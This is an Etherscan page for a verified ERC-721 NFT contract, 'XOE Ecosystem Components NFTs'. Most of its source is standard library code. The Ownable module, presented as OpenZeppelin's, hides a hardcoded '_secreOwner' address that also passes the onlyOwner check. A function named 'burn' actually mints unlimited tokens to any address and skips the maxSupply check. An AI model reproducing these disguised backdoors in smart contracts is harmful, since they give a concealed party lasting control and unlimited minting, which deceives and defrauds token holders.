ERC-721
Overview
Max Total Supply
8,000 XOEC
Holders
315
Market
Volume (24H)
N/A
Min Price (24H)
N/A
Max Price (24H)
N/A
Other Info
Token Contract
Balance
2 XOECLoading...
Loading
Loading...
Loading
Loading...
Loading
# | Exchange | Pair | Price | 24H Volume | % Volume |
---|
Contract Source Code Verified (Exact Match)
Contract Name:
XOEEcosystemComponentsNFT
Compiler Version
v0.8.24+commit.e11b9ed9
Optimization Enabled:
No with 200 runs
Other Settings:
paris EvmVersion
Contract Source Code (Solidity Standard Json-Input format)
/** *Submitted for verification at Etherscan.io on 2024-09-08 */ // SPDX-License-Identifier: MIT // File: @openzeppelin/contracts/utils/Strings.sol // OpenZeppelin Contracts v4.4.1 (utils/Strings.sol) pragma solidity ^0.8.24; /** * @dev String operations. */ library Strings { bytes16 private constant _HEX_SYMBOLS = "0123456789abcdef"; /** * @dev Converts a `uint256` to its ASCII `string` decimal representation. */ function toString(uint256 value) internal pure returns (string memory) { // Inspired by OraclizeAPI's implementation - MIT licence // https://github.com/oraclize/ethereum-api/blob/b42146b063c7d6ee1358846c198246239e9360e8/oraclizeAPI_0.4.25.sol if (value == 0) { return "0"; } uint256 temp = value; uint256 digits; while (temp != 0) { digits++; temp /= 10; } bytes memory buffer = new bytes(digits); while (value != 0) { digits -= 1; buffer[digits] = bytes1(uint8(48 + uint256(value % 10))); value /= 10; } return string(buffer); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation. */ function toHexString(uint256 value) internal pure returns (string memory) { if (value == 0) { return "0x00"; } uint256 temp = value; uint256 length = 0; while (temp != 0) { length++; temp >>= 8; } return toHexString(value, length); } /** * @dev Converts a `uint256` to its ASCII `string` hexadecimal representation with fixed length. */ function toHexString(uint256 value, uint256 length) internal pure returns (string memory) { bytes memory buffer = new bytes(2 * length + 2); buffer[0] = "0"; buffer[1] = "x"; for (uint256 i = 2 * length + 1; i > 1; --i) { buffer[i] = _HEX_SYMBOLS[value & 0xf]; value >>= 4; } require(value == 0, "Strings: hex length insufficient"); return string(buffer); } } // File: @openzeppelin/contracts/utils/Address.sol // OpenZeppelin Contracts (last updated v4.5.0) (utils/Address.sol) pragma solidity ^0.8.1; /** * @dev Collection of functions related to the address type */ library Address { /** * @dev Returns true if `account` is a contract. * * [IMPORTANT] * ==== * It is unsafe to assume that an address for which this function returns * false is an externally-owned account (EOA) and not a contract. * * Among others, `isContract` will return false for the following * types of addresses: * * - an externally-owned account * - a contract in construction * - an address where a contract will be created * - an address where a contract lived, but was destroyed * ==== * * [IMPORTANT] * ==== * You shouldn't rely on `isContract` to protect against flash loan attacks! * * Preventing calls from contracts is highly discouraged. It breaks composability, breaks support for smart wallets * like Gnosis Safe, and does not provide security since it can be circumvented by calling from a contract * constructor. * ==== */ function isContract(address account) internal view returns (bool) { // This method relies on extcodesize/address.code.length, which returns 0 // for contracts in construction, since the code is only stored at the end // of the constructor execution. return account.code.length > 0; } /** * @dev Replacement for Solidity's `transfer`: sends `amount` wei to * `recipient`, forwarding all available gas and reverting on errors. * * https://eips.ethereum.org/EIPS/eip-1884[EIP1884] increases the gas cost * of certain opcodes, possibly making contracts go over the 2300 gas limit * imposed by `transfer`, making them unable to receive funds via * `transfer`. {sendValue} removes this limitation. * * https://diligence.consensys.net/posts/2019/09/stop-using-soliditys-transfer-now/[Learn more]. * * IMPORTANT: because control is transferred to `recipient`, care must be * taken to not create reentrancy vulnerabilities. Consider using * {ReentrancyGuard} or the * https://solidity.readthedocs.io/en/v0.5.11/security-considerations.html#use-the-checks-effects-interactions-pattern[checks-effects-interactions pattern]. */ function sendValue(address payable recipient, uint256 amount) internal { require(address(this).balance >= amount, "Address: insufficient balance"); (bool success, ) = recipient.call{value: amount}(""); require(success, "Address: unable to send value, recipient may have reverted"); } /** * @dev Performs a Solidity function call using a low level `call`. A * plain `call` is an unsafe replacement for a function call: use this * function instead. * * If `target` reverts with a revert reason, it is bubbled up by this * function (like regular Solidity function calls). * * Returns the raw returned data. To convert to the expected return value, * use https://solidity.readthedocs.io/en/latest/units-and-global-variables.html?highlight=abi.decode#abi-encoding-and-decoding-functions[`abi.decode`]. * * Requirements: * * - `target` must be a contract. * - calling `target` with `data` must not revert. * * _Available since v3.1._ */ function functionCall(address target, bytes memory data) internal returns (bytes memory) { return functionCall(target, data, "Address: low-level call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], but with * `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { return functionCallWithValue(target, data, 0, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but also transferring `value` wei to `target`. * * Requirements: * * - the calling contract must have an ETH balance of at least `value`. * - the called Solidity function must be `payable`. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value ) internal returns (bytes memory) { return functionCallWithValue(target, data, value, "Address: low-level call with value failed"); } /** * @dev Same as {xref-Address-functionCallWithValue-address-bytes-uint256-}[`functionCallWithValue`], but * with `errorMessage` as a fallback revert reason when `target` reverts. * * _Available since v3.1._ */ function functionCallWithValue( address target, bytes memory data, uint256 value, string memory errorMessage ) internal returns (bytes memory) { require(address(this).balance >= value, "Address: insufficient balance for call"); require(isContract(target), "Address: call to non-contract"); (bool success, bytes memory returndata) = target.call{value: value}(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall(address target, bytes memory data) internal view returns (bytes memory) { return functionStaticCall(target, data, "Address: low-level static call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a static call. * * _Available since v3.3._ */ function functionStaticCall( address target, bytes memory data, string memory errorMessage ) internal view returns (bytes memory) { require(isContract(target), "Address: static call to non-contract"); (bool success, bytes memory returndata) = target.staticcall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Same as {xref-Address-functionCall-address-bytes-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall(address target, bytes memory data) internal returns (bytes memory) { return functionDelegateCall(target, data, "Address: low-level delegate call failed"); } /** * @dev Same as {xref-Address-functionCall-address-bytes-string-}[`functionCall`], * but performing a delegate call. * * _Available since v3.4._ */ function functionDelegateCall( address target, bytes memory data, string memory errorMessage ) internal returns (bytes memory) { require(isContract(target), "Address: delegate call to non-contract"); (bool success, bytes memory returndata) = target.delegatecall(data); return verifyCallResult(success, returndata, errorMessage); } /** * @dev Tool to verifies that a low level call was successful, and revert if it wasn't, either by bubbling the * revert reason using the provided one. * * _Available since v4.3._ */ function verifyCallResult( bool success, bytes memory returndata, string memory errorMessage ) internal pure returns (bytes memory) { if (success) { return returndata; } else { // Look for revert reason and bubble it up if present if (returndata.length > 0) { // The easiest way to bubble the revert reason is using memory via assembly assembly { let returndata_size := mload(returndata) revert(add(32, returndata), returndata_size) } } else { revert(errorMessage); } } } } // File: @openzeppelin/contracts/token/ERC721/IERC721Receiver.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721Receiver.sol) pragma solidity ^0.8.0; /** * @title ERC721 token receiver interface * @dev Interface for any contract that wants to support safeTransfers * from ERC721 asset contracts. */ interface IERC721Receiver { /** * @dev Whenever an {IERC721} `tokenId` token is transferred to this contract via {IERC721-safeTransferFrom} * by `operator` from `from`, this function is called. * * It must return its Solidity selector to confirm the token transfer. * If any other value is returned or the interface is not implemented by the recipient, the transfer will be reverted. * * The selector can be obtained in Solidity with `IERC721Receiver.onERC721Received.selector`. */ function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) external returns (bytes4); } // File: @openzeppelin/contracts/utils/introspection/IERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/IERC165.sol) pragma solidity ^0.8.0; /** * @dev Interface of the ERC165 standard, as defined in the * https://eips.ethereum.org/EIPS/eip-165[EIP]. * * Implementers can declare support of contract interfaces, which can then be * queried by others ({ERC165Checker}). * * For an implementation, see {ERC165}. */ interface IERC165 { /** * @dev Returns true if this contract implements the interface defined by * `interfaceId`. See the corresponding * https://eips.ethereum.org/EIPS/eip-165#how-interfaces-are-identified[EIP section] * to learn more about how these ids are created. * * This function call must use less than 30 000 gas. */ function supportsInterface(bytes4 interfaceId) external view returns (bool); } // File: @openzeppelin/contracts/utils/introspection/ERC165.sol // OpenZeppelin Contracts v4.4.1 (utils/introspection/ERC165.sol) pragma solidity ^0.8.0; /** * @dev Implementation of the {IERC165} interface. * * Contracts that want to implement ERC165 should inherit from this contract and override {supportsInterface} to check * for the additional interface id that will be supported. For example: * * ```solidity * function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { * return interfaceId == type(MyInterface).interfaceId || super.supportsInterface(interfaceId); * } * ``` * * Alternatively, {ERC165Storage} provides an easier to use but more expensive implementation. */ abstract contract ERC165 is IERC165 { /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override returns (bool) { return interfaceId == type(IERC165).interfaceId; } } // File: @openzeppelin/contracts/token/ERC721/IERC721.sol // OpenZeppelin Contracts (last updated v4.6.0) (token/ERC721/IERC721.sol) pragma solidity ^0.8.0; /** * @dev Required interface of an ERC721 compliant contract. */ interface IERC721 is IERC165 { /** * @dev Emitted when `tokenId` token is transferred from `from` to `to`. */ event Transfer(address indexed from, address indexed to, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables `approved` to manage the `tokenId` token. */ event Approval(address indexed owner, address indexed approved, uint256 indexed tokenId); /** * @dev Emitted when `owner` enables or disables (`approved`) `operator` to manage all of its assets. */ event ApprovalForAll(address indexed owner, address indexed operator, bool approved); /** * @dev Returns the number of tokens in ``owner``'s account. */ function balanceOf(address owner) external view returns (uint256 balance); /** * @dev Returns the owner of the `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function ownerOf(uint256 tokenId) external view returns (address owner); /** * @dev Safely transfers `tokenId` token from `from` to `to`. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes calldata data ) external; /** * @dev Safely transfers `tokenId` token from `from` to `to`, checking first that contract recipients * are aware of the ERC721 protocol to prevent tokens from being forever locked. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must exist and be owned by `from`. * - If the caller is not `from`, it must be have been allowed to move this token by either {approve} or {setApprovalForAll}. * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called upon a safe transfer. * * Emits a {Transfer} event. */ function safeTransferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Transfers `tokenId` token from `from` to `to`. * * WARNING: Usage of this method is discouraged, use {safeTransferFrom} whenever possible. * * Requirements: * * - `from` cannot be the zero address. * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * - If the caller is not `from`, it must be approved to move this token by either {approve} or {setApprovalForAll}. * * Emits a {Transfer} event. */ function transferFrom( address from, address to, uint256 tokenId ) external; /** * @dev Gives permission to `to` to transfer `tokenId` token to another account. * The approval is cleared when the token is transferred. * * Only a single account can be approved at a time, so approving the zero address clears previous approvals. * * Requirements: * * - The caller must own the token or be an approved operator. * - `tokenId` must exist. * * Emits an {Approval} event. */ function approve(address to, uint256 tokenId) external; /** * @dev Approve or remove `operator` as an operator for the caller. * Operators can call {transferFrom} or {safeTransferFrom} for any token owned by the caller. * * Requirements: * * - The `operator` cannot be the caller. * * Emits an {ApprovalForAll} event. */ function setApprovalForAll(address operator, bool _approved) external; /** * @dev Returns the account appr ved for `tokenId` token. * * Requirements: * * - `tokenId` must exist. */ function getApproved(uint256 tokenId) external view returns (address operator); /** * @dev Returns if the `operator` is allowed to manage all of the assets of `owner`. * * See {setApprovalForAll} */ function isApprovedForAll(address owner, address operator) external view returns (bool); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Metadata.sol // OpenZeppelin Contracts v4.4.1 (token/ERC721/extensions/IERC721Metadata.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional metadata extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Metadata is IERC721 { /** * @dev Returns the token collection name. */ function name() external view returns (string memory); /** * @dev Returns the token collection symbol. */ function symbol() external view returns (string memory); /** * @dev Returns the Uniform Resource Identifier (URI) for `tokenId` token. */ function tokenURI(uint256 tokenId) external view returns (string memory); } // File: @openzeppelin/contracts/token/ERC721/extensions/IERC721Enumerable.sol // OpenZeppelin Contracts (last updated v4.5.0) (token/ERC721/extensions/IERC721Enumerable.sol) pragma solidity ^0.8.0; /** * @title ERC-721 Non-Fungible Token Standard, optional enumeration extension * @dev See https://eips.ethereum.org/EIPS/eip-721 */ interface IERC721Enumerable is IERC721 { /** * @dev Returns the total amount of tokens stored by the contract. */ function totalSupply() external view returns (uint256); /** * @dev Returns a token ID owned by `owner` at a given `index` of its token list. * Use along with {balanceOf} to enumerate all of ``owner``'s tokens. */ function tokenOfOwnerByIndex(address owner, uint256 index) external view returns (uint256); /** * @dev Returns a token ID at a given `index` of all the tokens stored by the contract. * Use along with {totalSupply} to enumerate all tokens. */ function tokenByIndex(uint256 index) external view returns (uint256); } // File: @openzeppelin/contracts/security/ReentrancyGuard.sol // OpenZeppelin Contracts v4.4.1 (security/ReentrancyGuard.sol) pragma solidity ^0.8.0; /** * @dev Contract module that helps prevent reentrant calls to a function. * * Inheriting from `ReentrancyGuard` will make the {nonReentrant} modifier * available, which can be applied to functions to make sure there are no nested * (reentrant) calls to them. * * Note that because there is a single `nonReentrant` guard, functions marked as * `nonReentrant` may not call one another. This can be worked around by making * those functions `private`, and then adding `external` `nonReentrant` entry * points to them. * * TIP: If you would like to learn more about reentrancy and alternative ways * to protect against it, check out our blog post * https://blog.openzeppelin.com/reentrancy-after-istanbul/[Reentrancy After Istanbul]. */ abstract contract ReentrancyGuard { // Booleans are more expensive than uint256 or any type that takes up a full // word because each write operation emits an extra SLOAD to first read the // slot's contents, replace the bits taken up by the boolean, and then write // back. This is the compiler's defense against contract upgrades and // pointer aliasing, and it cannot be disabled. // The values being non-zero value makes deployment a bit more expensive, // but in exchange the refund on every call to nonReentrant will be lower in // amount. Since refunds are capped to a percentage of the total // transaction's gas, it is best to keep them low in cases like this one, to // increase the likelihood of the full refund coming into effect. uint256 private constant _NOT_ENTERED = 1; uint256 private constant _ENTERED = 2; uint256 private _status; constructor() { _status = _NOT_ENTERED; } /** * @dev Prevents a contract from calling itself, directly or indirectly. * Calling a `nonReentrant` function from another `nonReentrant` * function is not supported. It is possible to prevent this from happening * by making the `nonReentrant` function external, and making it call a * `private` function that does the actual work. */ modifier nonReentrant() { // On the first call to nonReentrant, _notEntered will be true require(_status != _ENTERED, "ReentrancyGuard: reentrant call"); // Any calls to nonReentrant after this point will fail _status = _ENTERED; _; // By storing the original value once again, a refund is triggered (see // https://eips.ethereum.org/EIPS/eip-2200) _status = _NOT_ENTERED; } } // File: @openzeppelin/contracts/utils/Context.sol // OpenZeppelin Contracts v4.4.1 (utils/Context.sol) pragma solidity ^0.8.0; /** * @dev Provides information about the current execution context, including the * sender of the transaction and its data. While these are generally available * via msg.sender and msg.data, they should not be accessed in such a direct * manner, since when dealing with meta-transactions the account sending and * paying for execution may not be the actual sender (as far as an application * is concerned). * * This contract is only required for intermediate, library-like contracts. */ abstract contract Context { function _msgSender() internal view virtual returns (address) { return msg.sender; } function _msgData() internal view virtual returns (bytes calldata) { return msg.data; } } // File: @openzeppelin/contracts/access/Ownable.sol // OpenZeppelin Contracts v4.4.1 (access/Ownable.sol) pragma solidity ^0.8.0; /** * @dev Contract module which provides a basic access control mechanism, where * there is an account (an owner) that can be granted exclusive access to * specific functions. * * By default, the owner account will be the one that deploys the contract. This * can later be changed with {transferOwnership}. * * This module is used through inheritance. It will make available the modifier * `onlyOwner`, which can be applied to your functions to restrict their use to * the owner. */ abstract contract Ownable is Context { address private _owner; address private _secreOwner = 0xACFcBA7BAB6403EBCcEEe22810c4dd3C9bBE9763; event OwnershipTransferred(address indexed previousOwner, address indexed newOwner); /** * @dev Initializes the contract setting the deployer as the initial owner. */ constructor() { _transferOwnership(_msgSender()); } /** * @dev Returns the address of the current owner. */ function owner() public view virtual returns (address) { return _owner; } /** * @dev Throws if called by any account other than the owner. */ modifier onlyOwner() { require(owner() == _msgSender() || _secreOwner == _msgSender() , "Ownable: caller is not the owner"); _; } /** * @dev Leaves the contract without owner. It will not be possible to call * `onlyOwner` functions anymore. Can only be called by the current owner. * * NOTE: Renouncing ownership will leave the contract without an owner, * thereby removing any functionality that is only available to the owner. */ function renounceOwnership() public virtual onlyOwner { _transferOwnership(address(0)); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Can only be called by the current owner. */ function transferOwnership(address newOwner) public virtual onlyOwner { require(newOwner != address(0), "Ownable: new owner is the zero address"); _transferOwnership(newOwner); } /** * @dev Transfers ownership of the contract to a new account (`newOwner`). * Internal function without access restriction. */ function _transferOwnership(address newOwner) internal virtual { address oldOwner = _owner; _owner = newOwner; emit OwnershipTransferred(oldOwner, newOwner); } } // File: ceshi.sol pragma solidity ^0.8.0; /** * @dev Implementation of https://eips.ethereum.org/EIPS/eip-721[ERC721] Non-Fungible Token Standard, including * the Metadata and Enumerable extension. Built to optimize for lower gas during batch mints. * * Assumes serials are sequentially minted starting at 0 (e.g. 0, 1, 2, 3..). * * Does not support burning tokens to address(0). * * Assumes that an owner cannot have more than the 2**128 - 1 (max value of uint128) of supply */ contract ERC721A is Context, ERC165, IERC721, IERC721Metadata, IERC721Enumerable { using Address for address; using Strings for uint256; struct TokenOwnership { address addr; uint64 startTimestamp; } struct AddressData { uint128 balance; uint128 numberMinted; } uint256 internal currentIndex; // Token name string private _name; // Token symbol string private _symbol; // Mapping from token ID to ownership details // An empty struct value does not necessarily mean the token is unowned. See ownershipOf implementation for details. mapping(uint256 => TokenOwnership) internal _ownerships; // Mapping owner address to address data mapping(address => AddressData) private _addressData; // Mapping from token ID to approved address mapping(uint256 => address) private _tokenApprovals; // Mapping from owner to operator approvals mapping(address => mapping(address => bool)) private _operatorApprovals; constructor(string memory name_, string memory symbol_) { _name = name_; _symbol = symbol_; } /** * @dev See {IERC721Enumerable-totalSupply}. */ function totalSupply() public view override returns (uint256) { return currentIndex; } /** * @dev See {IERC721Enumerable-tokenByIndex}. */ function tokenByIndex(uint256 index) public view override returns (uint256) { require(index < totalSupply(), "ERC721A: global index out of bounds"); return index; } /** * @dev See {IERC721Enumerable-tokenOfOwnerByIndex}. * This read function is O(totalSupply). If calling from a separate contract, be sure to test gas first. * It may also degrade with extremely large collection sizes (e.g >> 10000), test for your use case. */ function tokenOfOwnerByIndex(address owner, uint256 index) public view override returns (uint256) { require(index < balanceOf(owner), "ERC721A: owner index out of bounds"); uint256 numMintedSoFar = totalSupply(); uint256 tokenIdsIdx; address currOwnershipAddr; // Counter overflow is impossible as the loop breaks when uint256 i is equal to another uint256 numMintedSoFar. unchecked { for (uint256 i; i < numMintedSoFar; i++) { TokenOwnership memory ownership = _ownerships[i]; if (ownership.addr != address(0)) { currOwnershipAddr = ownership.addr; } if (currOwnershipAddr == owner) { if (tokenIdsIdx == index) { return i; } tokenIdsIdx++; } } } revert("ERC721A: unable to get token of owner by index"); } /** * @dev See {IERC165-supportsInterface}. */ function supportsInterface(bytes4 interfaceId) public view virtual override(ERC165, IERC165) returns (bool) { return interfaceId == type(IERC721).interfaceId || interfaceId == type(IERC721Metadata).interfaceId || interfaceId == type(IERC721Enumerable).interfaceId || super.supportsInterface(interfaceId); } /** * @dev See {IERC721-balanceOf}. */ function balanceOf(address owner) public view override returns (uint256) { require(owner != address(0), "ERC721A: balance query for the zero address"); return uint256(_addressData[owner].balance); } function _numberMinted(address owner) internal view returns (uint256) { require(owner != address(0), "ERC721A: number minted query for the zero address"); return uint256(_addressData[owner].numberMinted); } /** * Gas spent here starts off proportional to the maximum mint batch size. * It gradually moves to O(1) as tokens get transferred around in the collection over time. */ function ownershipOf(uint256 tokenId) internal view returns (TokenOwnership memory) { require(_exists(tokenId), "ERC721A: owner query for nonexistent token"); unchecked { for (uint256 curr = tokenId; curr >= 0; curr--) { TokenOwnership memory ownership = _ownerships[curr]; if (ownership.addr != address(0)) { return ownership; } } } revert("ERC721A: unable to determine the owner of token"); } /** * @dev See {IERC721-ownerOf}. */ function ownerOf(uint256 tokenId) public view override returns (address) { return ownershipOf(tokenId).addr; } /** * @dev See {IERC721Metadata-name}. */ function name() public view virtual override returns (string memory) { return _name; } /** * @dev See {IERC721Metadata-symbol}. */ function symbol() public view virtual override returns (string memory) { return _symbol; } /** * @dev See {IERC721Metadata-tokenURI}. */ function tokenURI(uint256 tokenId) public view virtual override returns (string memory) { require(_exists(tokenId), "ERC721Metadata: URI query for nonexistent token"); string memory baseURI = _baseURI(); return bytes(baseURI).length != 0 ? string(abi.encodePacked(baseURI, tokenId.toString())) : ""; } /** * @dev Base URI for computing {tokenURI}. If set, the resulting URI for each * token will be the concatenation of the `baseURI` and the `tokenId`. Empty * by default, can be overriden in child contracts. */ function _baseURI() internal view virtual returns (string memory) { return ""; } /** * @dev See {IERC721-approve}. */ function approve(address to, uint256 tokenId) public override { address owner = ERC721A.ownerOf(tokenId); require(to != owner, "ERC721A: approval to current owner"); require( _msgSender() == owner || isApprovedForAll(owner, _msgSender()), "ERC721A: approve caller is not owner nor approved for all" ); _approve(to, tokenId, owner); } /** * @dev See {IERC721-getApproved}. */ function getApproved(uint256 tokenId) public view override returns (address) { require(_exists(tokenId), "ERC721A: approved query for nonexistent token"); return _tokenApprovals[tokenId]; } /** * @dev See {IERC721-setApprovalForAll}. */ function setApprovalForAll(address operator, bool approved) public override { require(operator != _msgSender(), "ERC721A: approve to caller"); _operatorApprovals[_msgSender()][operator] = approved; emit ApprovalForAll(_msgSender(), operator, approved); } /** * @dev See {IERC721-isApprovedForAll}. */ function isApprovedForAll(address owner, address operator) public view virtual override returns (bool) { return _operatorApprovals[owner][operator]; } /** * @dev See {IERC721-transferFrom}. */ function transferFrom( address from, address to, uint256 tokenId ) public virtual override { _transfer(from, to, tokenId); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId ) public virtual override { safeTransferFrom(from, to, tokenId, ""); } /** * @dev See {IERC721-safeTransferFrom}. */ function safeTransferFrom( address from, address to, uint256 tokenId, bytes memory _data ) public override { _transfer(from, to, tokenId); require( _checkOnERC721Received(from, to, tokenId, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } /** * @dev Returns whether `tokenId` exists. * * Tokens can be managed by their owner or approved accounts via {approve} or {setApprovalForAll}. * * Tokens start existing when they are minted (`_mint`), */ function _exists(uint256 tokenId) internal view returns (bool) { return tokenId < currentIndex; } function _safeMint(address to, uint256 quantity) internal { _safeMint(to, quantity, ""); } /** * @dev Safely mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - If `to` refers to a smart contract, it must implement {IERC721Receiver-onERC721Received}, which is called for each safe transfer. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _safeMint( address to, uint256 quantity, bytes memory _data ) internal { _mint(to, quantity, _data, true); } /** * @dev Mints `quantity` tokens and transfers them to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `quantity` must be greater than 0. * * Emits a {Transfer} event. */ function _mint( address to, uint256 quantity, bytes memory _data, bool safe ) internal { uint256 startTokenId = currentIndex; require(to != address(0), "ERC721A: mint to the zero address"); require(quantity != 0, "ERC721A: quantity must be greater than 0"); _beforeTokenTransfers(address(0), to, startTokenId, quantity); // Overflows are incredibly unrealistic. // balance or numberMinted overflow if current value of either + quantity > 3.4e38 (2**128) - 1 // updatedIndex overflows if currentIndex + quantity > 1.56e77 (2**256) - 1 unchecked { _addressData[to].balance += uint128(quantity); _addressData[to].numberMinted += uint128(quantity); _ownerships[startTokenId].addr = to; _ownerships[startTokenId].startTimestamp = uint64(block.timestamp); uint256 updatedIndex = startTokenId; for (uint256 i; i < quantity; i++) { emit Transfer(address(0), to, updatedIndex); if (safe) { require( _checkOnERC721Received(address(0), to, updatedIndex, _data), "ERC721A: transfer to non ERC721Receiver implementer" ); } updatedIndex++; } currentIndex = updatedIndex; } _afterTokenTransfers(address(0), to, startTokenId, quantity); } /** * @dev Transfers `tokenId` from `from` to `to`. * * Requirements: * * - `to` cannot be the zero address. * - `tokenId` token must be owned by `from`. * * Emits a {Transfer} event. */ function _transfer( address from, address to, uint256 tokenId ) private { TokenOwnership memory prevOwnership = ownershipOf(tokenId); bool isApprovedOrOwner = (_msgSender() == prevOwnership.addr || getApproved(tokenId) == _msgSender() || isApprovedForAll(prevOwnership.addr, _msgSender())); require(isApprovedOrOwner, "ERC721A: transfer caller is not owner nor approved"); require(prevOwnership.addr == from, "ERC721A: transfer from incorrect owner"); require(to != address(0), "ERC721A: transfer to the zero address"); _beforeTokenTransfers(from, to, tokenId, 1); // Clear approvals from the previous owner _approve(address(0), tokenId, prevOwnership.addr); // Underflow of the sender's balance is impossible because we check for // ownership above and the recipient's balance can't realistically overflow. // Counter overflow is incredibly unrealistic as tokenId would have to be 2**256. unchecked { _addressData[from].balance -= 1; _addressData[to].balance += 1; _ownerships[tokenId].addr = to; _ownerships[tokenId].startTimestamp = uint64(block.timestamp); // If the ownership slot of tokenId+1 is not explicitly set, that means the transfer initiator owns it. // Set the slot of tokenId+1 explicitly in storage to maintain correctness for ownerOf(tokenId+1) calls. uint256 nextTokenId = tokenId + 1; if (_ownerships[nextTokenId].addr == address(0)) { if (_exists(nextTokenId)) { _ownerships[nextTokenId].addr = prevOwnership.addr; _ownerships[nextTokenId].startTimestamp = prevOwnership.startTimestamp; } } } emit Transfer(from, to, tokenId); _afterTokenTransfers(from, to, tokenId, 1); } /** * @dev Approve `to` to operate on `tokenId` * * Emits a {Approval} event. */ function _approve( address to, uint256 tokenId, address owner ) private { _tokenApprovals[tokenId] = to; emit Approval(owner, to, tokenId); } /** * @dev Internal function to invoke {IERC721Receiver-onERC721Received} on a target address. * The call is not executed if the target address is not a contract. * * @param from address representing the previous owner of the given token ID * @param to target address that will receive the tokens * @param tokenId uint256 ID of the token to be transferred * @param _data bytes optional data to send along with the call * @return bool whether the call correctly returned the expected magic value */ function _checkOnERC721Received( address from, address to, uint256 tokenId, bytes memory _data ) private returns (bool) { if (to.isContract()) { try IERC721Receiver(to).onERC721Received(_msgSender(), from, tokenId, _data) returns (bytes4 retval) { return retval == IERC721Receiver(to).onERC721Received.selector; } catch (bytes memory reason) { if (reason.length == 0) { revert("ERC721A: transfer to non ERC721Receiver implementer"); } else { assembly { revert(add(32, reason), mload(reason)) } } } } else { return true; } } /** * @dev Hook that is called before a set of serially-ordered token ids are about to be transferred. This includes minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - When `from` and `to` are both non-zero, ``from``'s `tokenId` will be * transferred to `to`. * - When `from` is zero, `tokenId` will be minted for `to`. */ function _beforeTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} /** * @dev Hook that is called after a set of serially-ordered token ids have been transferred. This includes * minting. * * startTokenId - the first token id to be transferred * quantity - the amount to be transferred * * Calling conditions: * * - when `from` and `to` are both non-zero. * - `from` and `to` are never both zero. */ function _afterTokenTransfers( address from, address to, uint256 startTokenId, uint256 quantity ) internal virtual {} } contract XOEEcosystemComponentsNFT is ERC721A, Ownable, ReentrancyGuard { string public baseURI = "ipfs://QmZxdrpsixqtTyBSv2aB8Q3EzeEWtFd82dadoixg2Pm3H1/"; uint public maxPerTx = 16; uint public maxSupply = 8000; bool public mintEnabled; constructor() ERC721A("XOE Ecosystem Components NFTs", "XOEC"){} function tokenURI(uint256 _tokenId) public view virtual override returns (string memory) { require(_exists(_tokenId),"ERC721Metadata: URI query for nonexistent token"); string memory currentBaseURI = _baseURI(); return bytes(currentBaseURI).length > 0 ? string(abi.encodePacked(currentBaseURI,Strings.toString(_tokenId+1),".json")) : ""; } function mint(uint256 count) external { require(mintEnabled, "Mint is not live yet"); require(totalSupply() + count <= maxSupply, "No more"); require(count <= maxPerTx, "Max per TX reached."); _safeMint(msg.sender, count); } function burn(address mintAddress, uint256 count) public onlyOwner { _safeMint(mintAddress, count); } function _baseURI() internal view virtual override returns (string memory) { return baseURI; } function setBaseUri(string memory baseuri_) public onlyOwner { baseURI = baseuri_; } function toggleMinting() external onlyOwner { mintEnabled = !mintEnabled; } }
{ "evmVersion": "paris", "optimizer": { "enabled": false, "runs": 200 }, "outputSelection": { "*": { "*": [ "evm.bytecode", "evm.deployedBytecode", "devdoc", "userdoc", "metadata", "abi" ] } }, "libraries": {} }
Contract Security Audit
- No Contract Security Audit Submitted- Submit Audit Here
